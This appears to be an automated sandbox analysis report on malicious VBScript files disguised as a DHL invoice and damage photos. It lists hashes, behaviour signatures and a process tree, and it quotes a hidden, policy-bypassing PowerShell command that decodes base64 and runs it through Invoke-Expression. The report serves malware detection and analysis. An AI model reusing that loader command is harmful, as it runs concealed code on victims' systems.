Overview

Score  Task
  10   Static
   1   DHL-INVOIC...09.vbs (windows7-x64)
   8   DHL-INVOIC...09.vbs (windows10-2004-x64)
  10   Damage Picture 1.vbs (windows7-x64)
   8   Damage Picture 1.vbs (windows10-2004-x64)
  10   Damage Picture 2.vbs (windows7-x64)
   8   Damage Picture 2.vbs (windows10-2004-x64)
  10   Damage Picture 3.vbs (windows7-x64)
   8   Damage Picture 3.vbs (windows10-2004-x64)
Analysis (score 10)

Max time kernel: 119s
Max time network: 120s
Platform: windows7_x64
Resource: win7-20240903-en
Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
Submitted: 07/03/2025, 11:49
Tasks

static1 (static task)
behavioral1: DHL-INVOICE_10094519030720250009.vbs on win7-20240903-en
behavioral2: DHL-INVOICE_10094519030720250009.vbs on win10v2004-20250217-en
behavioral3: Damage Picture 1.vbs on win7-20241010-en
behavioral4: Damage Picture 1.vbs on win10v2004-20250217-en
behavioral5: Damage Picture 2.vbs on win7-20240903-en
behavioral6: Damage Picture 2.vbs on win10v2004-20250217-en
behavioral7: Damage Picture 3.vbs on win7-20240903-en
General

Target: DHL-INVOICE_10094519030720250009.vbs
Size: 98KB
MD5: 33e243596a995b134c3862d2746d3a3a
SHA1: dc51212190c79cd89cfb6a629e3f7299673fa003
SHA256: d28c3371542ec4275020001c02ae26f41d0a11109375cffee6d22f56b9fc5259
SHA512: 545089424ea61e9c3871a75170d8695331bd991bf7fe8d10a5dd9a136db8b2015f9083faf86023c751550a9faa44ceb6ebfe5b6ae2d593d4261678eaa5a739c5
SSDEEP: 1536:PxfjFMLSEGgcX4XTA66MrhZLVzsBjuBl6D584BuvQNkHGwhJiz1U8x8x0yCzkIXG:PxGfjjLVzsBKB+uvNHTAaw8CyWVG
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell and hides the display window.
  PID 2716  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (powershell.exe)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 2716  powershell.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  PID 2716  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege  PID 2716  powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  PID 2192 (WScript.exe) wrote to memory of PID 2752, procid_target 28  (3 entries)
  PID 2752 (cmd.exe) wrote to memory of PID 2744, procid_target 30  (3 entries)
  PID 2744 (cmd.exe) wrote to memory of PID 2716, procid_target 32  (4 entries)
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-INVOICE_10094519030720250009.vbs"
  PID: 2192
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat" "
    PID: 2752
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat"
      PID: 2744
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
        PID: 2716
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 88KB
MD5: 3d0e294629c4b980cd16801696dc84cc
SHA1: 24b01453f405ca41d30c484cc7ef72a2d082d54a
SHA256: d4f97ee756677f0c7e58b5528f4b70b58e8fd5c9929af6f9148d9e3c3df5ae2a
SHA512: f146cfe93b3bdd562542ef1150f81c0d8c3c852d78b770b77a47815e4b99005aba8e2a55134d6b7ed0be192402ca7b6ceb831e3b2bc66a599a20eb15c6e5ea5f